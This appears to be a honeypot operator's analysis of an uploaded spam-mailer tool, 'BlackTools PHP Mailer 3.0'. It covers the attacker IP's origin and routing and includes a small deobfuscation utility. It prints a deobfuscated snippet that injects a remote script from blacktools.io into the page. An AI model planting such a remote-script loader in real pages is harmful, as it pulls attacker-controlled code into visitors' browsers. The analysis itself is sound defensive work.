
5.155.21.37-2018-10-19a

BlackTools PHP Mailer, version 3.0

A rebranded LeafMailer web email tool.

Origin

Download

Apparently, the attacker(s) thought they were uploading to a WSO web shell. My WordPress honey pot has a fairly full-featured WSO imitation, so the "FilesMAn"/"uploadFile" file transfer ended up in my honey pot instead of on disk as a file named blacktools.php.

This download is actually part of a larger campaign.

IP Address 5.155.21.37

No reverse lookup for 5.155.21.37, but p0f3 fingerprints the host at that IP address as "Linux 2.2.x-3.x (no timestamps)".

whois says that IP address comes from Damascus, Syria. I'm flattered. They're having a horrible war there.

inetnum:        5.155.0.0 - 5.155.127.255
netname:        SY-ISP-TARASSUL
descr:          Tarassul inetnet Service Provider
country:        SY
created:        2014-09-13T13:34:02Z
last-modified:  2014-09-13T13:34:02Z
address:        Syrian Telecommunication Est
address:        Damascus, Syria
nic-hdl:        AS4007-RIPE
created:        2010-03-10T10:43:10Z
last-modified:  2010-03-10T10:43:10Z

The traceroute seems weird. I got different routes on different days.

On 2018-10-17, the traceroute went through Hurricane Electric routers. The last two IP addresses that respond are:

  1. TenGE0-1-0-13.br02.ath01.pccwbtn.net (63.218.172.249)
  2. cyprus.te7-8.br03.ldn01.pccwbtn.net (63.218.34.58)

geoiplookup says those are in the USA, despite the "cyprus" in the host name. "pccwbtn.net" is a GoDaddy domain, although it appears to be associated with PCCW Global (pccwglobal.com), a mysterious "global service provider" out of Herndon, VA, which runs AS3491. 63.218.172.249 and 63.218.34.58 are both in AS3491. PCCW Global's website is pretty generic; I don't know what to think of it.

On 2018-10-19, the traceroute went through Cogent routers. The last two IP addresses that respond are:

  1. cyta.demarc.cogentco.com (149.14.126.34)
  2. depkapsalos-li-cust.cytanet.net (195.14.150.57)

cytanet.net apparently belongs to a Cypriot company, although the domain name is registered through NetworkSolutions. geoiplookup places the 195.14.150.57 address in Cyprus. cytanet.net is apparently the Cyprus Telecommunications Authority.

The Ugarit submarine cable, owned by CYTA, runs from Pentaskhinos, Cyprus to Tartous, Syria. Pentaskhinos is on the Greek side of Cyprus, and CYTA appears to be a Greek-Cypriot operation. The northern, Turkish, side has 2 cables that run to mainland Turkey.

Whatever browser the attacker(s) used sent "ar,en-US;q=0.9,en;q=0.8,cs;q=0.7" as the languages it accepts. The "ar" (Arabic) would seem to jibe with a Syrian attack.

The User Agent string "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" indicates the attackers used something other than Linux 2.2.x-3.x.

Analysis

No deobfuscation necessary: it was a cleartext download.

Blacktools PHP Mailer 3.0 is a copy of LeafMailer 2.7 with a lot more comments, probably because blacktools didn't feel confident stripping them out. Blacktools PHP Mailer does not have the phone-home that came with my honey pot's copy of LeafMailer.

There is one small piece of JavaScript added to Blacktools PHP Mailer. When deobfuscated it looks like this:

var _0xd00f=[
    "<script src=https://blacktools.io/images/Style.js></script>",
    "write"
];
document[_0xd00f[1]](_0xd00f[0]);

Looks like this writes a script tag into the HTML document that retrieves Style.js from blacktools.io. It's possible that this is just CSS, it's possible it does something wicked, and it's possible that blacktools uses download attempts as some kind of installation tracker or counter. Or it could be something else.
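As an added example (not part of the captured sample or of this write-up's original code), here is a small static resolver for the string-array obfuscation pattern used above: it parses the `_0x...` array, substitutes each indexed reference with its literal, rewrites `obj["name"]` calls into dotted form, and lists the external script URLs the resolved code would inject. The input is the snippet quoted above, embedded as a constructed string.

```javascript
// Constructed input: the deobfuscated-by-hand snippet from the sample,
// in the form the obfuscator emitted it (strings hoisted into one array).
const SAMPLE = `var _0xd00f=[
    "<script src=https://blacktools.io/images/Style.js></script>",
    "write"
];
document[_0xd00f[1]](_0xd00f[0]);`;

// Decode the escapes obfuscators commonly use inside string literals.
const ESC = { n: "\n", r: "\r", t: "\t", "\\": "\\", '"': '"', "'": "'", "/": "/" };
function unescapeLiteral(raw) {
  return raw.replace(/\\x([0-9a-f]{2})|\\u([0-9a-f]{4})|\\(.)/gi, (m, x, u, c) =>
    x ? String.fromCharCode(parseInt(x, 16))
      : u ? String.fromCharCode(parseInt(u, 16))
      : (ESC[c] !== undefined ? ESC[c] : c));
}

// Locate "var _0xNAME=[ ... ];" and return the array name, its decoded
// strings, and the code that follows the array declaration.
function parseStringArray(src) {
  const m = src.match(/var\s+(_0x[0-9a-f]+)\s*=\s*\[([\s\S]*?)\];/i);
  if (!m) throw new Error("no _0x string array found");
  const strings = [];
  const lit = /"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'/g;
  let s;
  while ((s = lit.exec(m[2])) !== null) {
    strings.push(unescapeLiteral(s[1] !== undefined ? s[1] : s[2]));
  }
  return { name: m[1], strings, rest: src.slice(m.index + m[0].length) };
}

// Replace every NAME[i] with the literal it resolves to, then turn
// obj["ident"] into obj.ident so the call reads as the author intended.
function deobfuscate(src) {
  const { name, strings, rest } = parseStringArray(src);
  const ref = new RegExp(name + "\\[(\\d+)\\]", "g");
  let out = rest.replace(ref, (_, i) => {
    const idx = Number(i);
    if (idx >= strings.length) throw new Error("index out of range: " + i);
    return JSON.stringify(strings[idx]);
  });
  out = out.replace(/\["([A-Za-z_$][\w$]*)"\]/g, ".$1");
  return out.trim();
}

// Pull out any external script URLs the resolved code would inject; for a
// defender this is the indicator worth blocking or watching for in proxy logs.
function injectedScriptUrls(code) {
  return Array.from(code.matchAll(/<script\s+src=["']?([^\s"'>]+)/gi), m => m[1]);
}
```

Running `deobfuscate(SAMPLE)` yields `document.write("<script src=https://blacktools.io/images/Style.js></script>");`, and `injectedScriptUrls` on that result returns the single blacktools.io URL.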

That URL just gave me 404 File Not Found, but blacktools.io did send a cookie:

__cfd=d956ef21ccf682ffd597a380c93b85 

I tried wget, wget with a User Agent, and lynx, all earned me 404s.

blacktools.io

The code claims that its website is blacktools.io.

Address: 104.27.171.124
Address: 104.27.170.124
Address: 2606:4700:30::681b:ab7c
Address: 2606:4700:30::681b:aa7c

That's a Namecheap domain name. The IP addresses are CloudFlare cover-ups.

blacktools.io seems like a place to download script-kiddie tools:

blacktools.io screenshot